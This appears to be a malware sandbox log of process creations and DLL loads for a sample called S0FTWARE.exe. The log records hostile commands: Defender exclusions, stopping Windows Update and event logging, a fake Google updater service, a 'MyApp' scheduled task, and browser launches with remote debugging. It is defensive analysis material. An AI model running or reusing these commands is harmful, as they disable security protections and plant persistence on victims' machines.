                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe"
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
                        Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        Source: C:\Windows\System32\powercfg.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineK" binpath= "C:\ProgramData\GoogleUP\Chrome\Updater.exe" start= "auto"
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineK"
                        Source: unknown Process created: C:\ProgramData\GoogleUP\Chrome\Updater.exe C:\ProgramData\GoogleUP\Chrome\Updater.exe
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\ProgramData\GHDAKKJJJK.exe "C:\ProgramData\GHDAKKJJJK.exe"
                        Source: C:\ProgramData\GHDAKKJJJK.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: unknown Process created: C:\Users\user\AppData\Roaming\service.exe C:\Users\user\AppData\Roaming\service.exe
                        Source: C:\Users\user\AppData\Roaming\service.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C schtasks /create /tn MyApp /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GCGHJEBGHJKE" & exit
                        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                        Source: C:\Users\user\Desktop\S0FTWARE.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\ProgramData\AAFIJKKEHJ.exe "C:\ProgramData\AAFIJKKEHJ.exe"
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MyApp /tr C:\Users\user\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
                        Source: C:\ProgramData\AAFIJKKEHJ.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\Desktop\S0FTWARE.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\S0FTWARE.exe Section loaded: winmm.dll
                        Source: C:\Users\user\Desktop\S0FTWARE.exe Section loaded: powrprof.dll
                        Source: C:\Users\user\Desktop\S0FTWARE.exe Section loaded: umpdc.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sspicli.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wininet.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rstrtmgr.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dbghelp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iertutil.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wldp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: profapi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winhttp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mswsock.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: winnsi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: urlmon.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: srvcli.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: netutils.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: schannel.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msasn1.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: dpapi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: gpapi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: amsi.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: userenv.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: version.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sxs.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mozglue.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wsock32.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: vcruntime140.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: msvcp140.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: propsys.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: edputil.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: wintypes.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: appresolver.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: bcp47langs.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: slc.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sppc.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: apphelp.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: pcacli.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: mpr.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: sfc_os.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: windows.fileexplorer.common.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: ntshrui.dll
                        Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Section loaded: linkinfo.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wlidsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: clipc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gamestreamingext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msauserext.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: tbs.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptnet.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptngc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptprov.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elscore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: elstrans.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: lfsvc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationframework.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: brokerlib.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationframeworkps.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: wtsapi32.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: winsta.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: bi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanagerclient.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: locationwinpalmisc.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: portabledevicetypes.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: mdmcommon.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                        Source: C:\ProgramData\AAFIJKKEHJ.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
